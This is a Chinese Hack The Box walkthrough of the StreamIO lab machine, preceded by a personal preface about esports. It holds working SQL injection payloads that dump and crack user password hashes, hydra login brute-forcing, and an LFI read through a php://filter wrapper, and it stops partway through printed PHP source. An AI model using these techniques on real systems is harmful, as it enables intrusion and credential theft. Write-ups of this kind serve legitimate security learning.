[hackthebox]StreamIO WriteUp

rainb0w

2023-12-10

前言

在今年的9月底之前，我拿到了几家比较心仪的offer，互联网大厂安全岗和乙方安全岗皆有。回想自己今年下半年的生活，还是比较充实的。一边实习，一边准备秋招，一边又研究自己感兴趣的安全技术。在拿到了秋招offer的一个月后，我向实验室总监提交了离职申请。离职的最后一晚，我在望京SOHO转了一圈，忽然发现自己已经很舍不得这里了。

我起初的想法是觉得回学校能够更轻松自由一点，想学什么就学什么。但是回到学校之后的一个多月里，我几乎天天都在摆烂，每天不是刷刷b站就是玩玩游戏，完全提不起学习的念头，之前想好的计划也全部落空。直到前些天，看到了Faker夺冠。

我大约是从S6开始关注英雄联盟赛事的。在我刚刚观看英雄联盟比赛的时候，Faker就已经是当之无愧的GOAT了。我对Faker最初的印象是觉得他个人实力很强，光是在中路站着就已经让人感觉脊背发凉了。但是我却并不是从S6，也就是Faker成为三冠王的时候开始喜欢Faker的。我最开始喜欢Faker的时候，是在去年全球总决赛半决赛，T1对阵JDG的时候。我记得当时是第四局，Faker操刀的沙皇在这一局里发挥非常亮眼。印象很深的一波是Faker在JDG蓝区果断闪现过墙赶路，然后大招推回两人，从那一刻起，这场比赛对于JDG来说已经渐渐走远了。但这一波也只能说明Faker是一个很果断、面对机会敢于大胆尝试的选手，真正让我感到动容的是在后面中路的一波团战，Faker漂移+大招推到敌方四个人的那一波。那一波打完之后，镜头给了Faker一个特写，我看到Faker满含笑意的眼睛里出现了一滴眼泪。

那一刻，我深深地被Faker的个人魅力所折服。那个时候距离Faker第一次登上赛场已经过去很多年了，但是Faker对于英雄联盟的热爱却从未减弱。即使很多人觉得他已经老了，已经完全没有办法跟年轻人去拼操作了，但是他依然凭借自己的努力站在比赛的舞台上并打出出色的表现。因此即使去年T1决赛输给了DRX，我也并未对Faker的喜爱减少半分，因为我相信像他这样的人，是一定会再得到一个冠军的。

只是命运似乎总是喜欢捉弄人，它在让一个人成功之前，总是要先让这个人吃点苦头。在 T1 拿到了世界赛亚军之后，命运又送给了这支队伍两次亚军，T1也被戏称为大满亚队伍。在今年7月份的时候，Faker因为手伤折磨，下场休息了一个月。在这一个月的时间里，T1打了8个BO3只赢了1把。说实话，当时看到这个战绩的时候，我就对于今年T1能够再拿到一个冠军不再抱有任何信心了。但是Faker回来之后，又带领4个队友成功杀到夏季赛决赛，然后又拿了一个亚军……虽说与之前的战绩相比亚军也已经可以了，但是我也并不觉得今年Faker能够拿到冠军。因为去年一路所向披靡都没有拿到冠军，更何况今年呢？而世界赛初期T1的表现似乎也印证了我的想法，比如T1第一局对阵TL都差点翻车，碰到Geng又输了一局。然后我就是抱着这样看衰的心态，看着Faker带着4个队友一路过五关斩六将，以对位 LPL赛区 11-1的豪华战绩拿到了世界赛的冠军。

看到Faker拿到了他的第四冠，我是打心底里佩服和高兴的，但是高兴之余又会想到自己。这段时间我一直在问自己可不可以做到像Faker这样，对于自己热爱的事业数十年如一日的坚持下去。Faker从S6之后的故事似乎只是在告诉我们一件事，那就是用十年的时间坚持不懈的去做一件事，梦想才有可能成真。在明白了这一点之后，我开始打起精神。我希望自己可以做到像Faker那样，保持谦逊，并且对于自己热爱的事情可以全力以赴地去做。

因此最近我又有了学习的动力，这些天也是挑了一些HTB的靶机打了打，想让自己的手感恢复起来。接下来的文章就是对我在打StreamIO这台靶机的时候所想到的一些思路和采用的方法做一个记录，尽可能详细吧。

GetShell

因为靶场比较复杂，为了使得网络尽量稳定，我们在连接VPN的时候可以通过代理服务器连接。向.ovpn文件中添加如下配置：

其中192.168.135.1是我的代理服务器的IP，7890是代理端口，你需要改成你自己的。另外OpenVPN的http-proxy必须使用TCP协议。通过代理连接VPN，速度还是比较快的：

接下来开始打靶，首先执行nmap -sT -p- --min-rate 5000 -oA nmapscan/ports 10.10.11.158看看开放的端口：

# Nmap 7.94SVN scan initiated Fri Dec  8 00:36:44 2023 as: nmap -sT -p- --min-rate 5000 -oA nmapscan/ports 10.10.11.158
Nmap scan report for 10.10.11.158
Host is up (0.28s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49705/tcp open  unknown
51260/tcp open  unknown

# Nmap done at Fri Dec  8 00:38:18 2023 -- 1 IP address (1 host up) scanned in 93.30 seconds

接下来进行详细端口扫描：

nmap -sT -sV -sC -O -p 53,80,88,135,139,389,443,445,464,593,636,5985,9389,49667,49673,49674,49705,51260 --min-rate 5000 -oA nmapscan/details 10.10.11.158

Nmap scan report for 10.10.11.158
Host is up (0.38s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-08 12:44:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2023-12-08T12:46:06+00:00; +7h00m00s from scanner time.
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
51260/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2023-12-08T12:45:31
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec  8 00:46:13 2023 -- 1 IP address (1 host up) scanned in 119.55 seconds

通过扫描信息，可以判断这是一台DC。接着将streamio.htb和watch.streamio.htb写入到hosts。因为开放了139和445端口，尝试smb匿名连接：

执行crackmapexec smb 10.10.11.158可以扫到一台机子，将dc.streamio.htb也添加进hosts：

接下来就扫一下子域名吧：

$ wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "HOST: FUZZ.streamio.htb" -u https://streamio.htb/ --hw 24 --hc 400
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                   
=====================================================================

000002268:   200        78 L     245 W      2829 Ch     "watch - watch"                                                                                                           

Total time: 240.1962
Processed Requests: 19966
Filtered Requests: 19965
Requests/sec.: 83.12368

没有收获，只扫到一个已有的watch.streamio.htb。接下来我们访问一下这台主机部署的Web服务：

80端口是一个很普通的IIS Server的欢迎界面，没什么值得关注的点。接下来我们访问一下443端口，以下是https://streamio.htb的界面：

尝试注册登录，显示注册成功，但是登录却登录不上，sqlmap扫了也没什么发现。对其他地方进行检查，也没有发现可疑的点。接下来看看https://watch.streamio.htb/：

分析之后没得到可以利用的点。那接下来就爆破一下目录吧：

# feroxbuster -u https://streamio.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ https://streamio.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      151c https://streamio.htb/images => https://streamio.htb/images/
301      GET        2l       10w      150c https://streamio.htb/admin => https://streamio.htb/admin/
301      GET        2l       10w      147c https://streamio.htb/js => https://streamio.htb/js/
301      GET        2l       10w      148c https://streamio.htb/css => https://streamio.htb/css/
200      GET        2l     1276w    88145c https://streamio.htb/js/jquery-3.4.1.min.js
200      GET      231l      571w     7825c https://streamio.htb/about.php
200      GET      192l     1006w    82931c https://streamio.htb/images/icon.png
200      GET      395l      915w    13497c https://streamio.htb/index.php
200      GET      101l      173w     1663c https://streamio.htb/css/responsive.css
200      GET      111l      269w     4145c https://streamio.htb/login.php
200      GET        5l      374w    21257c https://streamio.htb/js/popper.min.js
200      GET       51l      213w    19329c https://streamio.htb/images/client.jpg
200      GET      863l     1698w    16966c https://streamio.htb/css/style.css
200      GET      206l      430w     6434c https://streamio.htb/contact.php
200      GET      913l     5479w   420833c https://streamio.htb/images/about-img.png
302      GET        0l        0w        0c https://streamio.htb/logout.php => https://streamio.htb/
200      GET      367l     1995w   166220c https://streamio.htb/images/contact-img.png
200      GET      395l      915w    13497c https://streamio.htb/
200      GET      121l      291w     4500c https://streamio.htb/register.php
200      GET      191l      253w     3120c https://streamio.htb/css/login.css
301      GET        2l       10w      157c https://streamio.htb/admin/images => https://streamio.htb/admin/images/
301      GET        2l       10w      154c https://streamio.htb/admin/css => https://streamio.htb/admin/css/
301      GET        2l       10w      153c https://streamio.htb/admin/js => https://streamio.htb/admin/js/
200      GET      274l     1677w   150222c https://streamio.htb/images/barry.png
200      GET     2059l    12754w  1028337c https://streamio.htb/images/samantha.png
200      GET     1753l    10007w   871140c https://streamio.htb/images/oliver.png
301      GET        2l       10w      150c https://streamio.htb/fonts => https://streamio.htb/fonts/
403      GET        1l        1w       18c https://streamio.htb/admin/index.php
301      GET        2l       10w      156c https://streamio.htb/admin/fonts => https://streamio.htb/admin/fonts/
200      GET        2l        6w       58c https://streamio.htb/admin/master.php
404      GET       40l      156w     1888c https://streamio.htb/con
404      GET       40l      156w     1894c https://streamio.htb/admin/con
404      GET       40l      156w     1895c https://streamio.htb/images/con
404      GET       40l      156w     1891c https://streamio.htb/js/con
404      GET       40l      156w     1892c https://streamio.htb/css/con
404      GET       40l      156w     1901c https://streamio.htb/admin/images/con
404      GET       40l      156w     1898c https://streamio.htb/admin/css/con
404      GET       40l      156w     1897c https://streamio.htb/admin/js/con
404      GET       40l      156w     1894c https://streamio.htb/fonts/con
404      GET       40l      156w     1900c https://streamio.htb/admin/fonts/con
404      GET       40l      156w     1888c https://streamio.htb/aux
404      GET       40l      156w     1894c https://streamio.htb/admin/aux
404      GET       40l      156w     1895c https://streamio.htb/images/aux
404      GET       40l      156w     1891c https://streamio.htb/js/aux
404      GET       40l      156w     1892c https://streamio.htb/css/aux
404      GET       40l      156w     1901c https://streamio.htb/admin/images/aux
404      GET       40l      156w     1898c https://streamio.htb/admin/css/aux
404      GET       40l      156w     1897c https://streamio.htb/admin/js/aux
404      GET       40l      156w     1894c https://streamio.htb/fonts/aux
404      GET       40l      156w     1900c https://streamio.htb/admin/fonts/aux
400      GET        6l       26w      324c https://streamio.htb/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/images/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/js/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/css/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/images/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/css/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/js/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/images/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/css/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/js/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/images/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/css/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/js/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/fonts/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/fonts/error%1F_log.php
400      GET        6l       26w      324c https://streamio.htb/admin/fonts/error%1F_log
400      GET        6l       26w      324c https://streamio.htb/admin/fonts/error%1F_log.php
404      GET       40l      156w     1888c https://streamio.htb/prn
404      GET       40l      156w     1894c https://streamio.htb/admin/prn
404      GET       40l      156w     1895c https://streamio.htb/images/prn
404      GET       40l      156w     1891c https://streamio.htb/js/prn
404      GET       40l      156w     1892c https://streamio.htb/css/prn
404      GET       40l      156w     1901c https://streamio.htb/admin/images/prn
404      GET       40l      156w     1898c https://streamio.htb/admin/css/prn
404      GET       40l      156w     1897c https://streamio.htb/admin/js/prn
404      GET       40l      156w     1894c https://streamio.htb/fonts/prn
404      GET       40l      156w     1900c https://streamio.htb/admin/fonts/prn
[####################] - 13m   265889/265889  0s      found:80      errors:1      
[####################] - 13m    26584/26584   34/s    https://streamio.htb/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/images/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/admin/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/js/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/css/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/admin/images/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/admin/css/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/admin/js/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/fonts/ 
[####################] - 13m    26584/26584   34/s    https://streamio.htb/admin/fonts/

发现一个/admin的目录，直接访问显示forbidden：

发现爆破结果中还有一个https://streamio.htb/admin/master.php，访问一下：

提示我们只能通过包含来访问，因此我们可以推断某个地方应该是存在LFI的。这个域名的其余目录没什么收获，接下来爆破一下watch.streamio.htb这个二级域名的目录：

$ feroxbuster -u https://watch.streamio.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ https://watch.streamio.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      136l      295w    22042c https://watch.streamio.htb/static/logo.png
200      GET      192l     1006w    82931c https://watch.streamio.htb/static/icon.png
200      GET       72l      112w      875c https://watch.streamio.htb/static/css/index.css
200      GET       78l      245w     2829c https://watch.streamio.htb/
200      GET       25l       34w      247c https://watch.streamio.htb/static/css/search.css
200      GET    10837l    20418w   195704c https://watch.streamio.htb/static/css/bootstrap.css
200      GET     7193l    19558w   253905c https://watch.streamio.htb/search.php
301      GET        2l       10w      161c https://watch.streamio.htb/static/css => https://watch.streamio.htb/static/css/
403      GET       29l       92w     1233c https://watch.streamio.htb/static/
301      GET        2l       10w      160c https://watch.streamio.htb/static/js => https://watch.streamio.htb/static/js/
301      GET        2l       10w      157c https://watch.streamio.htb/static => https://watch.streamio.htb/static/
403      GET       29l       92w     1233c https://watch.streamio.htb/static/css/
200      GET       78l      245w     2829c https://watch.streamio.htb/index.php
404      GET       40l      156w     1888c https://watch.streamio.htb/con
404      GET       40l      156w     1895c https://watch.streamio.htb/static/con
404      GET       40l      156w     1899c https://watch.streamio.htb/static/css/con
404      GET       40l      156w     1898c https://watch.streamio.htb/static/js/con
200      GET       20l       47w      677c https://watch.streamio.htb/blocked.php
404      GET       40l      156w     1888c https://watch.streamio.htb/aux
404      GET       40l      156w     1895c https://watch.streamio.htb/static/aux
404      GET       40l      156w     1899c https://watch.streamio.htb/static/css/aux
404      GET       40l      156w     1898c https://watch.streamio.htb/static/js/aux
400      GET        6l       26w      324c https://watch.streamio.htb/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/error%1F_log.php
400      GET        6l       26w      324c https://watch.streamio.htb/static/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/static/css/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/static/error%1F_log.php
400      GET        6l       26w      324c https://watch.streamio.htb/static/css/error%1F_log.php
400      GET        6l       26w      324c https://watch.streamio.htb/static/js/error%1F_log
400      GET        6l       26w      324c https://watch.streamio.htb/static/js/error%1F_log.php
404      GET       40l      156w     1888c https://watch.streamio.htb/prn
404      GET       40l      156w     1895c https://watch.streamio.htb/static/prn
404      GET       40l      156w     1899c https://watch.streamio.htb/static/css/prn
404      GET       40l      156w     1898c https://watch.streamio.htb/static/js/prn
[####################] - 5m    106359/106359  0s      found:34      errors:1      
[####################] - 5m     26584/26584   84/s    https://watch.streamio.htb/ 
[####################] - 5m     26584/26584   84/s    https://watch.streamio.htb/static/ 
[####################] - 5m     26584/26584   84/s    https://watch.streamio.htb/static/css/ 
[####################] - 5m     26584/26584   84/s    https://watch.streamio.htb/static/js/

可以找到一个https://watch.streamio.htb/search.php和https://watch.streamio.htb/blocked.php，访问/search.php之后显示的是一个搜索界面，不用多说，大概率存在SQL注入的漏洞：

访问/blocked.php，界面如下：

提示的有可疑行为，会被block 5分钟。首先对/search.php进行手工注入，传入1' and 1=1-- -和1' and 1=2-- -结果不同，传入1' and 1=1-- -和1' and 2=2-- -结果相同。很明显，存在盲注。之后传入1' and (select count(*) from sysobjects)>0-- -之后，页面回显正常，判断数据库为MSSQL。起初我发现xp_cmdshell是开启状态，想直接利用它执行命令，但是又发现我们的权限并不是sysadmin，所以没法利用，遂放弃。

因为禁用了order，所以我们使用union select来判断列数，通过在union select后不断添加字段数量，得到列数为6，回显点为2和3：

接着尝试得到数据：

#获取版本
000' union select 1,(select @@version),3,4,5,6-- -

Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
	Sep 24 2019 13:48:23 
	Copyright (C) 2019 Microsoft Corporation
	Express Edition (64-bit) on Windows Server 2019 Standard 10.0 

#获取当前数据库名
000' union select 1,(select db_name()),3,4,5,6-- -

STREAMIO

#获取所有数据库名
000' union select 1,(select name from master..sysdatabases for xml path),3,4,5,6-- -

<row><name>master</name></row><row><name>tempdb</name></row><row><name>model</name></row><row><name>msdb</name></row><row><name>STREAMIO</name></row><row><name>streamio_backup</name></row>

#获取表名
000' union select 1,(select name from STREAMIO..sysobjects where xtype='u' for xml path),3,4,5,6-- -

<row><name>movies</name></row><row><name>users</name></row>

#获取users表中的列名
000' union select 1,(select name from STREAMIO..syscolumns where id=(select max(id) from STREAMIO..sysobjects where xtype='u' and name='users') for xml path),3,4,5,6-- -

<row><name>id</name></row><row><name>is_staff</name></row><row><name>password</name></row><row><name>username</name></row>

#获取username和password
000' union select 1,(select username,password from STREAMIO..users for xml path),3,4,5,6-- -

James c660060492d9edcaa8332d89c99c9239 Theodore 925e5408ecb67aea449373d668b7359e Samantha 083ffae904143c4796e464dac33c1f7d Lauren 08344b85b329d7efd611b7a7743e8a09 William d62be0dc82071bccc1322d64ec5b6c51 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5 Robert f03b910e2bd0313a23fdd7575f34a694 Thane 3577c47eb1e12c8ba021611e1280753c Carmon 35394484d89fcfdb3c5e447fe749d213 Barry 54c88b2dbd7b1a84012fabc1a4c73415 Oliver fd78db29173a5cf701bd69027cb9bf6b Michelle b83439b16f844bd6ffe35c02fe21b3c0 Gloria 0cfaaaafb559f081df2befbe66686de0 Victoria b22abb47a02b52d5dfa27fb0b534f693 Alexendra 1c2b3d8270321140e5153f6637d3ee53 Baxter 22ee218331afd081b0dcd8115284bae3 Clara ef8f3d30a856cf166fb8215aca93e9ff Barbra 3961548825e3e21df5646cafe11c6c76 Lenord ee0b8a0937abd60c2882eacb2f8dc49f Austin 0049ac57646627b8d7aeaccf8b6a936f Garfield 8097cedd612cc37c29db152b6e9edbd3 Juliette 6dcd87740abb64edfa36d170f0d5450d Victor bf55e15b119860a6e6b5a164377da719 Lucifer 7df45a9e3de3863807c026ba48e55fb3 Bruno 2a4e2cf22dd8fcb45adcb91be1e22ae8 Diablo ec33265e5fc8c2f1b0c137bb7b3632b5 Robin dc332fb5576e9631c9dae83f194f8e70 Stan 384463526d288edcc95fc3701e523bc7 yoshihide b779ba15cedfd22a023c4d8bcf5f2332 admin 665a50ac9eaa781e4f7f04199db97a11

得到了一批密码，使用hash-identifier检验之后，发现密码是使用md5算法生成。

接下来尝试对这批密码进行解密，但是解密之前我们需要对我们的数据进行一些处理。比如将username都储存在一个文件里，然后password都储存在一个文件里，以及按照username:password的格式再生成一个文件。为此，我写了个小脚本来帮我完成这件事情：

a = "James c660060492d9edcaa8332d89c99c9239 Theodore 925e5408ecb67aea449373d668b7359e Samantha 083ffae904143c4796e464dac33c1f7d Lauren 08344b85b329d7efd611b7a7743e8a09 William d62be0dc82071bccc1322d64ec5b6c51 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5 Robert f03b910e2bd0313a23fdd7575f34a694 Thane 3577c47eb1e12c8ba021611e1280753c Carmon 35394484d89fcfdb3c5e447fe749d213 Barry 54c88b2dbd7b1a84012fabc1a4c73415 Oliver fd78db29173a5cf701bd69027cb9bf6b Michelle b83439b16f844bd6ffe35c02fe21b3c0 Gloria 0cfaaaafb559f081df2befbe66686de0 Victoria b22abb47a02b52d5dfa27fb0b534f693 Alexendra 1c2b3d8270321140e5153f6637d3ee53 Baxter 22ee218331afd081b0dcd8115284bae3 Clara ef8f3d30a856cf166fb8215aca93e9ff Barbra 3961548825e3e21df5646cafe11c6c76 Lenord ee0b8a0937abd60c2882eacb2f8dc49f Austin 0049ac57646627b8d7aeaccf8b6a936f Garfield 8097cedd612cc37c29db152b6e9edbd3 Juliette 6dcd87740abb64edfa36d170f0d5450d Victor bf55e15b119860a6e6b5a164377da719 Lucifer 7df45a9e3de3863807c026ba48e55fb3 Bruno 2a4e2cf22dd8fcb45adcb91be1e22ae8 Diablo ec33265e5fc8c2f1b0c137bb7b3632b5 Robin dc332fb5576e9631c9dae83f194f8e70 Stan 384463526d288edcc95fc3701e523bc7 yoshihide b779ba15cedfd22a023c4d8bcf5f2332 admin 665a50ac9eaa781e4f7f04199db97a11"
a = a.split(' ')
f_user = open("username", "a")
f_pass = open("password", "a")
f_uap = open("userpass", "a")
for i in range(0, len(a)):
    if i % 2 == 0:
        f_user.write(a[i] + '\n')
        f_uap.write(a[i] + ":")
    else:
        f_pass.write(a[i] + '\n')
        f_uap.write(a[i] + "\n")
f_uap.close()
f_user.close()
f_pass.close()

接下来使用hashcat对密码进行破解：

└─# hashcat userpass /usr/share/wordlists/rockyou.txt --username -m 0 --show
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd

继续对该结果进行处理，将username都储存在一个文件里，将已破解的password都储存在一个文件里，以及按照username:password的格式再生成一个文件。

hashcat userpass /usr/share/wordlists/rockyou.txt --username -m 0 --show > tmp
cat tmp |awk -F : '{print $1}' > cracked_username
cat tmp |awk -F : '{print $3}' > cracked_password
cat tmp |awk -F : -v OFS=":" '{print $1,$3}' > cracked_userpass

因为我们拿到的是STREAMIO的users数据库，可以猜测出这应该可以用于https://streamio.htb的登录。但是随便用了一批账户密码没登进去，那试试爆破一下：

└─# hydra -C cracked_userpass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:Failed"             
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-10 11:35:12
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:Failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-10 11:35:14

得到了一对可用的账号密码：yoshihide:66boysandgirls..。接下来登录之后，访问之前爆破出的/admin目录：

是一个管理员面板。经过观察，发现GET传入的参数不同，会转到不同的页面：

但是尝试将这些参数的值改成之前得到的master.php之后，并未得到任何结果。因此可以尝试参数爆破，看看是否存在我们隐藏界面，以下是爆破的结果：

# wfuzz -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt -c -u https://streamio.htb/admin/?FUZZ= -H "Cookie: PHPSESSID=puqalerh2km91i9t6p5aa0qggq"  --hw 131
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/?FUZZ=
Total requests: 6453

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                   
=====================================================================

000001575:   200        49 L     137 W      1712 Ch     "debug"                                                                                                                   
000003530:   200        10790    25878 W    320235 Ch   "movie"                                                                                                                   
                        L                                                                                                                                                         
000005450:   200        398 L    916 W      12484 Ch    "staff"                                                                                                                   
000006133:   200        62 L     160 W      2073 Ch     "user"                                                                                                                    

Total time: 76.33917
Processed Requests: 6453
Filtered Requests: 6449
Requests/sec.: 84.53064

可以看到，还存在一个debug参数，我们访问之后，结果如下：

可以看到，这里提示我们此选项仅供开发者使用。我们将debug的值设为master.php之后，发现又出现了movie、staff以及user的管理界面的详情。尝试php伪协议读一下代码：

1	https://streamio.htb/admin/?debug=php://filter/read=convert.base64-encode/resource=master.php

将得到的结果base64解码后，得到master.php的源码：

<h1>Movie managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST" action="?movie=">
				<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
